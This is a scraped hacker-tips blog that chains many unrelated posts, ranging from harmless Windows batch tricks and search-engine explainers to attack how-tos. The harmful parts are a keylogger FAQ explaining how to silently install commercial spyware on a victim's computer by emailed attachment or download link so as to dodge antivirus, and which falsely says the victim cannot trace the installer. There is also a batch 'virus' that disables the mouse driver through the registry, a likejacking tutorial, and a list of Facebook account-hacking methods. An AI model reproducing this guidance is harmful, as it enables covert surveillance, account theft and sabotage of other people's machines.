Pages

Wednesday, 4 December 2013

Top 10 Ways to Hack Facebook Accounts


Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers have , I have written a couple of post related to facebook hacking here. I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2013, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts.

10 Ways How Hackers Can Hack Facebook Accounts

So here are the top 10 methods which have been the most popular in Everytime :


1. Facebook Phishing

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.


2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.




3. Stealers


Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful.


4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's.



5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.


6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.



7. DNS Spoofing 

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.



8. USB Hacking

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser.



9. Man In the Middle Attacks

If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article,


10. Botnets

Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

The Difference Between a DoS and a DDoS Attack



DoS = Denial Of Service

DDoS = Distributed Denial Of Service


What is the difference between the two?

Whilst DoS and DDoS sound remarkably similar there are in fact differences between the two -

DoS

A DoS Attack is a Denial of Service attack.

This means that one computer and one internet connection is used to flood a server with packets (TCP / UDP).

The point of such a denial of service attack is to overload the targeted server’s bandwidth and other resources.

This will make the server inaccessible to others, thereby blocking the website or whatever else is hosted there.

DDoS

A DDoS Attack is a Distributed Denial of Service Attack.

In most respects it is similar to a DoS attack but the results are much, much different.

Instead of one computer and one internet connection the DDoS attack utilises many computers and many connections.

The computers behind such an attack are often distributed around the whole world and will be part of what is known as a botnet.

The main difference between a DDoS attack vs a DoS attack, therefore, is that the target server will be overload by hundreds or even thousands of requests in the case of the former as opposed to just one attacker in the case of the latter.

Therefore it is much, much harder for a server to withstand a DDoS attack as opposed to the simpler DoS incursion.

FAQ On Keyloggers - A Complete Guide


I have written a few articles on Keyloggers , Yet i get lot of comments and emails from readers asking me various doubts and clarifications, so to clear them. i have started a new section in my blog FAQ i have compiled and answered all frequently asked questions about key loggers

FAQ  On Keyloggers - A Complete Keylogger Guide

1. What is A Keylogger 
A keylogger also called as spy software  is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed in just a few seconds and once installed, you are only a step away from getting the target password and other sensitive data.


2. What Are The Types Of Keyloggers 
Software Keyloggers
Hardware Keyloggers

3. How Keylogger Works 
Basically once when a Keylogger is installed on a PC, it starts operating in the background it captures the keystrokes typed by the victim some advanced Keyloggers even capture screen shots and sends them to the attacker via Email , FTP etc

4.  What is The Use Of Keyloggers 
Since Keyloggers capture every keystroke and its stealth (Invisible) Its mainly used for monitoring children, Spouse , Workers . It is also used by hackers to Hack email accounts , Face book Accounts etc

5. Do I need any special knowledge to install and use the keylogger?
No, now a days Keyloggers are very user friendly, Can be used by anyone who has basic knowledge of Computers

6. Can the victim detect it's presence once key logger is installed in his/her computer?
This depends on the Keylogger which you use, usually Free Keyloggers are easily detected by Av's. To my knowledge the once which are not detected are Sniper spy, realtimeSpy , Win spy and more..

7. Can Victim Trace Back Me After i install the Keylogger in His/Her computer
No, its impossible to trace you back

8. Which is the Best Keylogger 
Today, there exists hundreds of key loggers in the market and most of them are no more than a scam. So, I have personally tested some of the top keyloggers and concluded Sniper Spy as the best one And as an alternative You can use Win spy




9. Why Sniper Spy ?
Sniper spy eliminates the need for Physical Access Not only that it has some of most advanced features such as live Monitoring , bypass Firewalls, Record Scree shots etc. It has its own server where all the victim logs get stored thus eliminating the need of third party Email Accounts Or FTP Accounts , People who have already used key loggers will know the use of this, usually ordinary key loggers use GMail or ymail for Receiving logs lately GMail have started banning email accounts which are being used for receiving key logs

10. How Sniper Spy Works
After you purchase Sniper spy, you’ll be able to create the installation module using an easy set-up program. You need to email this module to the remote user as an attachment.When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the Sniper Spy servers continuously.You can login to your Sniper spy account (you get this after purchase) to see the logs which contains the password.

11.  I don’t have physical access to the target computer. Can I still use Sniper Spy?
Yes you can! Sniper Spy supports remote instillation feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation, all you need to do is just place the module in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).

12. What if the antivirus prevents me from sending an email attachment?
Instead of sending the key logger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.fileden.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

13. Can I install Sniper Spy on a local computer?
If you need to install to your local computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module. Double-click the module file name to execute it. Nothing will appear on the screen but the software gets installed silently.

Hope This FAQ guide helps you to understand what is keylogger & how it work.

READ more -> Hack  Account With Keylogger

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse.

Enable God Mode In Windows 7 And Windows 8


In this tutorial i will show you to enable God Mode in Windows 7, Win8 & Vista. By enabling God mode you can access all your windows setting from one folder and it makes really easy to access and change windows settings. This work 32 as well as 64 bit operating system. So lets enable God mode on your computer.


How to do it ?

  1. On your desktop right click and create a New Folder.
  2. Rename this folder to the code given below.

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

  3. Done now double click on this folder and you will have access to all your windows operating system settings.

Video Tutorial On Enabling God Mode

How To Disable Right Click On Your Website Or Blog



If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.

How To Disable Right Click On Your Blog ?

 1. Got to your blogger Dashboard and then Click on Layout.


 2. Now Click on Add Gadget and select Html/Javascript.


 3. Now paste code given below in the pop up window.

<!--MBW Code-->
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<!--Code End http://hackerzpositive.blogspot.in>


4. Save it and done. Now users will not be able to right click on your website.

How To Open Number Of Sites With One Click

How To Open Number Of Sites With One Click ?

websites


Today i will show you how to make a batch file which will open number of websites with just one click. You can also use this method to open different computer programmes like internet explorer, notepad etc.


Open Notepad and copy below codes

@echo off
start www.hackerzpositive.blogspot.com/
start www.google.com/
start www.facebook.com/

start www.yahoo.com/
start www.youtube.com/




  • you can also add more website which you want to open.
  • Save this file as batch.bat
  • Now open your save file and it will open three websites wilth just one click.
  • You can also add more sites by writting Start followed by websites.

Advance Matrix Effect Using Notepad

How To Create Matrix File ?

matrix

  1. Open 
Notepad and copy below code.

@echo off
color 0A
:A
echo b r E w e 4 e T r 8 M e F r a c h a S t 3 
D a C r a s p e s T e 4 h 2 w r e G 2
ping -w .9 >nul
echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e
ping -w .9 >nul
echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a Z
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a
ping -w .9 >nul
echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t  
ping -w .9 >nul
echo b R u G e p a R e s a P H e P a 2 U d 4 P r e F A b a t h a t h U s w a d R U d
ping -w .9 >nul
echo v U Y a C R e T R 9 k u b e D r a T 6 u j e 5 2 4 e B a f 2 u b 5 w A p a y U Y
ping -w .9 >nul
echo b r E w e 4 e n r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 a 2 w r e G 2
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b s u c e d U s w a 3 a c r a t h U 7 r a k u t u h u V e 7 U k u S a
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b u u d
ping -w .9 >nul
goto A



2. Save the file as matrix.bat  (.bat is must)

Make A Virus That Disable Mouse

I am previously posted on making different batch files like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.


-Open Notepad and copy below codes.

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------



-Save this file as  virus.bat

-Done you just created your virus.

Finding Ip Address Of A Website Using Command Prompt Or CMD


In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.
How to find IP ?

How to find IP ?

1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.


3. It will take less then a second and come up with the results as shown below.


In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.

Password Protect Any Folder Without Any Software

Password_protected_folder
In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7,win 8). Follow below tutorial to learn this trick.


How To Lock Folder ?

 1. Open Notepad and Copy code given below into it.


cls
@ECHO OFF
title hackerzpositive.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%==
bloodyhackers  goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End



2. Save the notepad file as lock.bat (.bat is must)
3. Now double click on lock.bat and a new folder will be created with name MyFolder
4. Copy all your data you want to protect in that New folder
5. Now double click on lock.bat and when command promp appears Type Y and press enter.
6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
7. It will ask for password enter your password and done. (Default password is bloodyhackers )


->To change the password replace  bloodyhackers  with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

HOW SEARCH ENGINES WORK


Today we will show How a search engine works. Here I will not go on detail, But a breif description on this. Hope you Enjoy and learn something.

There are many search engines on the world of Internet. Top on them Is Google.

Search engine:- Google, Bing, Yahoo, AltaVista, Excite and many More.

Later on We will learn How Google works?




HOW SEARCH ENGINES WORK ?


What happens when a searcher[users] enters keywords?

A Search engine does not examine every page on the web. When a user puts in a query on the search box, the engine first builds an index of it

Custom database of all the words on all pages

– Search engine also stores other information.


The search query is everything that the user types to get results which is made up of one or more search terms, plus optional special characters.

FIRSTLY


It examine the Query what the user are for searching, and then expand that query. Means check the words variants[ plural/singular, verbs, Nouns]
  •  Then check the Spelling on the Query.
  •  Check the word order
  •  Checks the search operator [e.g. putting IP: ip address] for searching the Ip of sites.

Next It match the query presents on its database [SERVER]. After then It match the query with all the data that have been Crawled by it.

The Results are sent to the Index Server where it is indexed that which query should be displayed first on the searched results.

This results is made by the rank of the page, which is known as PAGE RANK.
page rank

You can check your page rank of your site from HERE

After all these process finally there required results displayed on your screen.
All thses is done within a seconds only and it gives you the results what you wants.
Hope these help you.
HOW GOOGLE WORKS 

HERE WE WILL KNOW HOW GOOGLE WORKS ?

google
As we all know that GOOGLE is the worlds most popular Search engine on our planet Earth. All Most, all user use www.google.com to search any query or any stuff on the internet.INTRODUCTION

Google began in March 1996 as a research project by Larry Page and Sergey Brin, Ph.D. students at Stanford, California, U.S. 

The term "Google" was originally "Googol", A term meaning the number "1" followed by 100 zeros, created by prominent mathematician Edward kasner.

Google search engine is a web search owned by Goolge Inc. and is the most used search engine on the web.


How it works.?
How google works
Firstly when users enter search query on the google search box, and after pressing enter OR clicking on the search option. The query goes to Google Web Server

The web server sends the query to the index servers. The content inside the index servers is similar to the index in the back of a book. It tell which pages contain the words that match any particular query term.

The query travels to the doc servers, which actually retrieve the strored documents. Snippers are generated to describe each search results.

The Search results are returned to the user in a fraction of a second.

Search engines gather the information and the number of web pages from internet with the help of small software known as "Spiders or Google Bot"

Google store the complete content of a web page which is known as Cache, whereas other search engines stores only keywords.


Google allows upto 32 words to enter in the query box.

Hope you Understand How GOOGLE works ?

Clickjacking

What is Clickjacking?


Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from general view. In this situation what happens is that You think that you are clicking on a standard button or link, like the PLAY button or download button on an video or some stuff, but you are really clicking on a hidden link. Since you can’t see the clickjacker’s hidden link, you have no idea what you’re really doing. You could be downloading malware or making all your Facebook information public without realizing it. Some good hackers make ajax keyloggers and put them as javascripts over their fake websites and when you open them they retrieve all your passwords stored in web browser and records whatever you type while the web browser is open and stores this information on their servers.

There are several types of clickjacking but the most common is to hide a LIKE button under a dummy or fake button. This technique is called Likejacking. A scammer or hacker might trick you by saying that you like a product you’ve never heard. At first glance, likejacking sounds more annoying than harmful, but that’s not always true. If you’re scammed for liking Mark Zukenberg
, the world isnt likely to end. But you may be helping to spread spam or possibly sending Friends somewhere that contains malware.




How It Work ?

The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like button is clicked and your fan page is liked.First download the JavaScript from the below download link.

CLICK HERE  <--


After downloading the script extract all the files.Now modify the config.js and follow the below instructions.

1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.

2. There is a time out function after which the like button will not be present(move) anymore. 
"time" if set to 0 will make it stay forever(which is usually not preferred).

3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible

Properly set the var in the file if it is jumbled ?

After modifying the config.js script upload these scripts to javascript hosting website.I prefer yourjavascript you can also upload to some other website.

How To Run The Script ?

1. Add config.js just above head tag in your pages
------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/config.js"> </script>
------------------------------------------------------------------------------------------------------------

2. Add like.js after body tag in your pages
------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/like.js"> </script>
------------------------------------------------------------------------------------------------------------

Remove src link with your uploaded link.

5. That's it. The script is ready to go.